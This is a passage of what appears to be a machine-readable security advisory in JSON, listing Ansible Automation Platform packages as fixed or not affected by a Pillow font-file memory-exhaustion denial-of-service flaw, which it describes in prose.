"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el9ap.noarch"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2497466"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Pillow, a Python imaging library. When processing a specially crafted font file, the library\u0027s font compilation function does not adequately check for excessive memory allocation. This oversight allows a remote attacker to trigger an unreasonable consumption of system memory, leading to a denial of service (DoS) for the application.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "python-pillow: Pillow: Denial of Service via excessive memory allocation when processing font files",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "A flaw was found in Pillow prior to version 12.3.0. The FontFile.compile() method in PIL/FontFile.py assembles per-glyph images into a combined bitmap using Image.new() without calling Image._decompression_bomb_check(). This allows a specially crafted font file to trigger excessive memory allocation during conversion or saving, leading to denial of service via resource exhaustion.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64"
],
"known_not_affected": [
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
